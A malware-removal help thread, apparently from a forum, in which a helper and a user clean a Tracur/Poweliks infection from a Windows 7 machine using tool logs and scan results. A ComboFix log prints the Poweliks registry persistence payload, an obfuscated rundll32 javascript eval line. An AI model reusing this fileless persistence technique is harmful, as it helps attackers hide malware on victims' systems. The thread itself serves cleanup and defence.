Solved That fake "Chrome" browser.exe infection

Yes, sorry. Been deployed at another site for a project this week, and haven't been able to coordinate with the user on this machine for the next step.
 
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 28-09-2014 02
Ran by bella at 2014-09-29 16:42:09 Run:1
Running from C:\Users\bella\Desktop
Loaded Profile: bella (Available profiles: bella & crystal & mor1 & Administrator & setup)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKU\S-1-5-21-336078627-3664855205-978596220-1153\...\Run: [wvxdmfokq] => rundll32.exe "C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll",DllRegisterServer <===== ATTENTION
C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.153\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll No File
S3 McAfee SiteAdvisor Service; c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe [X]
S3 catchme; \??\C:\Users\bella\AppData\Local\Temp\catchme.sys [X]
S4 LMIRfsClientNP; No ImagePath
S1 SASDIFSV; \??\C:\Users\bella\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV.SYS [X]
S1 SASKUTIL; \??\C:\Users\bella\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL.SYS [X]
C:\Users\bella\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmppmchf8.dll
C:\Users\bella\AppData\Local\Temp\Quarantine.exe
Task: {7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9} - System32\Tasks\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF} => C:\Windows\system32\bwjbt.dll/s "C:\Windows\system32\bwjbt.dll"
Task: {86F63824-521F-4B32-A196-C881D5D820F3} - System32\Tasks\{EEB24AC8-CECD-565F-1D17-BB284BABA67C} => C:\Windows\system32\vihsfy.dll/s "C:\Windows\system32\vihsfy.dll"
Task: {882EFFD9-D52E-4618-BA3E-A48DDA9DF907} - System32\Tasks\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB} => C:\Windows\system32\lkzat.dll/s "C:\Windows\system32\lkzat.dll"
C:\Windows\system32\bwjbt.dll
C:\Windows\system32\vihsfy.dll
C:\Windows\system32\lkzat.dll
Task: {9400D8DC-981F-41FA-AB9B-6563A8803675} - System32\Tasks\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E} => C:\Windows\system32\nfxmxrz.dll/s "C:\Windows\system32\nfxmxrz.dll"
C:\Windows\system32\nfxmxrz.dll
Task: {E9626A09-0716-4133-9EF9-088C9EA46DA6} - System32\Tasks\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73} => C:\Windows\system32\qywcwk.dll/s "C:\Windows\system32\qywcwk.dll"
Task: {F4DCB859-DA48-40EE-9001-B5AFDF2CC19B} - System32\Tasks\{2418D788-DCD6-326A-E4C6-FACCA1838469} => C:\Windows\system32\cxelqm.dll/s "C:\Windows\system32\cxelqm.dll"
C:\Windows\system32\qywcwk.dll
C:\Windows\system32\cxelqm.dll
*****************
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKU\S-1-5-21-336078627-3664855205-978596220-1153\Software\Microsoft\Windows\CurrentVersion\Run\\wvxdmfokq => Value not found.
"C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll" => File/Directory not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
C:\Program Files\Google\Update\1.3.21.153\npGoogleUpdate3.dll not found.
c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll not found.
McAfee SiteAdvisor Service => Service deleted successfully.
catchme => Service deleted successfully.
LMIRfsClientNP => Service deleted successfully.
SASDIFSV => Service deleted successfully.
SASKUTIL => Service deleted successfully.
"C:\Users\bella\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmppmchf8.dll" => File/Directory not found.
"C:\Users\bella\AppData\Local\Temp\Quarantine.exe" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9}" => Key deleted successfully.
C:\Windows\System32\Tasks\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86F63824-521F-4B32-A196-C881D5D820F3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86F63824-521F-4B32-A196-C881D5D820F3}" => Key deleted successfully.
C:\Windows\System32\Tasks\{EEB24AC8-CECD-565F-1D17-BB284BABA67C} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EEB24AC8-CECD-565F-1D17-BB284BABA67C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{882EFFD9-D52E-4618-BA3E-A48DDA9DF907}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{882EFFD9-D52E-4618-BA3E-A48DDA9DF907}" => Key deleted successfully.
C:\Windows\System32\Tasks\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB}" => Key deleted successfully.
"C:\Windows\system32\bwjbt.dll" => File/Directory not found.
"C:\Windows\system32\vihsfy.dll" => File/Directory not found.
"C:\Windows\system32\lkzat.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9400D8DC-981F-41FA-AB9B-6563A8803675}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9400D8DC-981F-41FA-AB9B-6563A8803675}" => Key deleted successfully.
C:\Windows\System32\Tasks\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E}" => Key deleted successfully.
"C:\Windows\system32\nfxmxrz.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E9626A09-0716-4133-9EF9-088C9EA46DA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9626A09-0716-4133-9EF9-088C9EA46DA6}" => Key deleted successfully.
C:\Windows\System32\Tasks\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F4DCB859-DA48-40EE-9001-B5AFDF2CC19B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4DCB859-DA48-40EE-9001-B5AFDF2CC19B}" => Key deleted successfully.
C:\Windows\System32\Tasks\{2418D788-DCD6-326A-E4C6-FACCA1838469} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2418D788-DCD6-326A-E4C6-FACCA1838469}" => Key deleted successfully.
"C:\Windows\system32\qywcwk.dll" => File/Directory not found.
"C:\Windows\system32\cxelqm.dll" => File/Directory not found.
==== End of Fixlog ====
 
How is computer doing?

Last scans...

redtarget.gif
Download Security Check from here or here and save it to your Desktop.
  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2 SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run


redtarget.gif
Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.

redtarget.gif
Download Temp File Cleaner (TFC)
Alternate download: http://www.itxassociates.com/OT-Tools/TFC.exe
  • Double click on TFC.exe to run the program.
  • Click on Start button to begin cleaning process.
  • TFC will close all running programs, and it may ask you to restart computer.

redtarget.gif
Please run a free online scan with the ESET Online Scanner

  • Disable your antivirus program
  • Internet Explorer users - Click on this link to open ESET OnlineScan.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on ESET Smart Installer to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the http://www.bleepstatic.com/fhost/uploads/0/esetsmartinstaller_enu.png][/url] icon on your desktop.
      [/LIST]
      [*]Check [I]"YES, I accept the Terms of Use."[/I]
      [*]Click the [b]Start[/b] button.
      [*]Accept any security warnings from your browser.[/*]
      [*]Check [I]"Enable detection of potentially unwanted applications"[/I].
      [*]Click [I]Advanced settings[/I] and make sure all 4 boxes are checkmarked (two of them are already checkmarked by default).
      Do NOT checkmark [I]"Use custom proxy settings"[/I]
      [*]Click the [b]Start[/b] button.
      [*]ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
      [*]When the scan completes, click [b]List Threats[/b][/*]
      [*]Click [b]Export[/b], and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
      [*]Click the [b]Back[/b] button.
      [*]Click the [b]Finish[/b] button.
      [/LIST]
 
Ugh. User was out on Friday and shut down the machine, so I couldn't get to it over the weekend. Will have her leave it on tonight.

She did have strange errors cropping up, so something is still resident.
 
(Weird. I posted this 5 hours ago, but it didn't post. It did hold in the message buffer.)

Ha-haaaa~~~!

Not only were there more problems this morning, but the dllhost issue that started all this is back again. Can't tell if it was a reinfection in some fashion, or if the existing remnants were able to get back in place. But now I can't even get rid of THAT infection the way I did before, which I had to try to get the user at all workable for the day. (Combofix/rkill/TDSSkiller/AdwCleaner/et al)

Right now I'm keeping it at with a recurring "tskill dllhost" script, which will at least keep the infection from eating up all her RAM and CPU and basically taking it out. I'll have full access to it when she goes home for the day, apply your previous steps and anything else you may suggest before 4:30pm EST.

It seems like it's making an external call to draw in all the dllhost processes, as with the network cable unplugged I would see a single dllhost process running, but with it plugged back in, dozens would build up again. It would occur in Safe Mode with Networking, too. (Can everything you've suggested run in Safe Mode with Command Prompt normally? If I can, that may be the best way to attack this.)

*sigh*

Bozhe moi.
 
Results of screen317's Security Check version 0.99.88
Windows 7 Service Pack 1 x86 (UAC is disabled!)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Firewall Disabled!
WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
Adobe Reader XI
Google Chrome 37.0.2062.120
Google Chrome 37.0.2062.124
````````Process Check: objlist.exe by Laurent````````
Malwarebytes Anti-Malware mbamservice.exe
SAAZOD Malwarebytes' Anti-Malware mbamscheduler.exe
SAAZOD Malwarebytes' Anti-Malware mbam-msp.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: 2%
````````````````````End of Log``````````````````````



-----------------------------------------------------------------------------------------------------------------------------------------

Farbar Service Scanner Version: 21-07-2014
Ran by bella (administrator) on 06-10-2014 at 16:36:40
Running from "C:\Users\bella\Desktop"
Microsoft Windows 7 Professional Service Pack 1 (X86)
Boot Mode: Normal
****************************************************************
Internet Services:
============
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:
=============
Firewall Disabled Policy:
==================

System Restore:
============
System Restore Disabled Policy:
========================

Action Center:
============

Windows Update:
============
Windows Autoupdate Disabled Policy:
============================

Windows Defender:
==============
Other Services:
==============

File Check:
========
C:\Windows\system32\nsisvc.dll => File is digitally signed
C:\Windows\system32\Drivers\nsiproxy.sys => File is digitally signed
C:\Windows\system32\dhcpcore.dll => File is digitally signed
C:\Windows\system32\Drivers\afd.sys => File is digitally signed
C:\Windows\system32\Drivers\tdx.sys => File is digitally signed
C:\Windows\system32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\system32\dnsrslvr.dll => File is digitally signed
C:\Windows\system32\mpssvc.dll => File is digitally signed
C:\Windows\system32\bfe.dll => File is digitally signed
C:\Windows\system32\Drivers\mpsdrv.sys => File is digitally signed
C:\Windows\system32\SDRSVC.dll => File is digitally signed
C:\Windows\system32\vssvc.exe => File is digitally signed
C:\Windows\system32\wscsvc.dll => File is digitally signed
C:\Windows\system32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\system32\wuaueng.dll => File is digitally signed
C:\Windows\system32\qmgr.dll => File is digitally signed
C:\Windows\system32\es.dll => File is digitally signed
C:\Windows\system32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\system32\ipnathlp.dll => File is digitally signed
C:\Windows\system32\iphlpsvc.dll => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed

**** End of log ****

-----------------------------------------------------------------------------------------------------------------------------------------

C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\precache.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\SaUpdate.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\UpdateTask.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\Updater\Updater.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\ProgramData\Ask\APN-Stub\AD5\APNIC.dll.vir a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application deleted - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.21.16\rtkt0000\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.30.30\rtkt0000\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.30.30\rtkt0001\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\Users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll a variant of Win32/Kryptik.CKGI trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Local\Microsoft\wvxdmfokq.dll Win32/TrojanDownloader.Tracur.AM trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\Macromedia\jttxbtp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\fplbpzn.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ftbp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ftrd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\jptpv.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\lrjjnj.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ltnvr.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\pznlf.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\tnrdb.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\vfhzvbf.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\vjbd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\xdddfv.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zffndjnx.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zrrxrjtd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zxppzvxp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zxptj.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\Downloads\Avery Wizard 4.01 - US 20111209.exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application deleted - quarantined
C:\Windows\Installer\7c1f006.msi a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\Windows\Installer\{57EA7009-3830-42B0-A0A6-4783233E8875}\msiexec.exe a variant of Win32/Injector.BMRI trojan cleaned by deleting - quarantined
C:\Windows\Installer\{75B25EA4-EFA1-4FBB-B244-878C3D339197}\msiexec.exe a variant of Generik.MSGWPCY trojan cleaned by deleting - quarantined
C:\Windows\Installer\{BD235F53-DB1F-4511-9810-8099A623C716}\msiexec.exe a variant of Win32/Kryptik.CMJT trojan cleaned by deleting - quarantined
C:\Windows\Installer\{D018F48B-0A82-454E-9D1F-110DD8DDBCEC}\msiexec.exe a variant of Generik.MSGWPCY trojan cleaned by deleting - quarantined
C:\Windows\System32\vsjnrsv.dll a variant of MSIL/Injector.FQD trojan cleaned by deleting - quarantined
 
Some additional results of things I had to run earlier today, to try to keep the machine manageable: (With some garbage ComboFix text removed.)

ComboFix 14-10-04.01 - bella 10/06/2014 10:20:20.4.4 - x86 NETWORK
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.3493.2573 [GMT -4:00]
Running from: c:\users\bella\Downloads\ComboFix.exe
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\lmhosts
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
<NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server
AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
<NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll
ThreadingModel REG_SZ Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
<NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))

.
((((((((((((((((((((((((( Files Created from 2014-09-06 to 2014-10-06 )))))))))))))))))))))))))))))))
.
.
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\Public\AppData\Local\temp
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\bella\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\setup\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\mor1\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\crystal\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\administrator\AppData\Local\temp
2014-10-03 06:55 . 2014-10-03 06:55 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1FAD817A-F54A-433E-8181-6DBD3EED6056}\offreg.dll
2014-10-03 06:54 . 2014-09-09 01:24 8806800 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1FAD817A-F54A-433E-8181-6DBD3EED6056}\mpengine.dll
2014-09-24 23:11 . 2014-09-24 23:11 48640 ----a-w- c:\windows\system32\vsjnrsv.dll
2014-09-17 22:00 . 2014-10-05 22:05 40776 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-09-17 12:07 . 2014-10-03 01:20 -------- d-sh--w- c:\users\bella\AppData\Local\EmieUserList
2014-09-17 12:07 . 2014-09-17 12:07 -------- d-sh--w- c:\users\bella\AppData\Local\EmieSiteList
2014-09-17 07:32 . 2014-08-18 21:30 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-17 07:31 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-17 07:25 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-17 07:25 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-09-17 07:25 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-09-17 07:25 . 2012-02-11 05:37 317440 ----a-w- c:\windows\system32\spoolsv.exe
2014-09-17 04:04 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-09-16 23:39 . 2014-09-16 23:39 -------- d-s---w- c:\windows\system32\CompatTel
2014-09-16 21:46 . 2014-09-16 21:46 -------- d-----w- c:\windows\Migration
2014-09-16 21:33 . 2014-09-16 21:38 -------- d-----w- c:\windows\system32\MRT
2014-09-16 21:31 . 2012-07-26 03:21 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-09-16 21:31 . 2012-07-26 03:20 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-09-16 21:31 . 2012-07-26 03:20 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-09-16 21:31 . 2012-07-26 03:20 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-09-16 21:31 . 2012-07-26 03:20 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-09-16 21:31 . 2012-07-26 02:33 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-09-16 21:31 . 2012-07-26 02:32 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-09-16 21:30 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-16 21:30 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-09-16 21:30 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-09-16 21:30 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-16 21:24 . 2013-05-10 04:56 12625408 ----a-w- c:\windows\system32\wmploc.DLL
2014-09-16 21:24 . 2013-05-10 03:48 164864 ----a-w- c:\program files\Windows Media Player\wmplayer.exe
2014-09-16 21:20 . 2014-09-16 21:20 1505280 ----a-w- c:\windows\system32\d3d11.dll
2014-09-16 21:11 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-16 21:10 . 2013-01-24 04:47 196328 ----a-w- c:\windows\system32\drivers\fvevol.sys
2014-09-16 21:10 . 2012-08-21 20:12 245760 ----a-w- c:\windows\system32\OxpsConverter.exe
2014-09-16 21:10 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-16 21:10 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-16 21:10 . 2013-08-05 01:56 133056 ----a-w- c:\windows\system32\drivers\ataport.sys
2014-09-16 21:10 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-16 21:10 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-16 21:10 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-09-16 21:10 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-09-16 21:10 . 2013-10-30 02:19 301568 ----a-w- c:\windows\system32\msieftp.dll
2014-09-16 21:09 . 2013-07-12 10:07 86016 ----a-w- c:\windows\system32\drivers\usbcir.sys
2014-09-16 21:09 . 2012-01-04 08:58 442880 ----a-w- c:\windows\system32\ntshrui.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-09-16 21:09 . 2013-12-04 02:03 423936 ----a-w- c:\windows\system32\secproc_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 428032 ----a-w- c:\windows\system32\secproc.dll
2014-09-16 21:09 . 2013-12-04 02:02 390144 ----a-w- c:\windows\system32\msdrm.dll
2014-09-16 21:09 . 2013-12-04 01:54 510976 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-09-16 21:09 . 2013-12-04 01:54 594944 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-09-16 21:09 . 2013-12-04 01:54 572416 ----a-w- c:\windows\system32\RMActivate.exe
2014-09-16 21:09 . 2013-12-04 01:54 508928 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-09-16 21:06 . 2013-11-27 01:14 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-09-16 21:06 . 2013-11-27 01:13 284672 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-09-16 21:06 . 2013-11-27 01:13 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-09-16 21:06 . 2013-11-27 01:13 43520 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-09-16 21:06 . 2013-11-27 01:13 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2014-09-16 21:06 . 2013-11-27 01:13 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-09-16 21:06 . 2013-11-27 01:13 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-09-16 21:02 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-09-16 21:02 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-09-16 21:02 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-09-16 21:02 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-09-16 21:02 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-09-16 21:02 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-09-16 21:02 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-09-16 21:02 . 2014-05-14 13:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
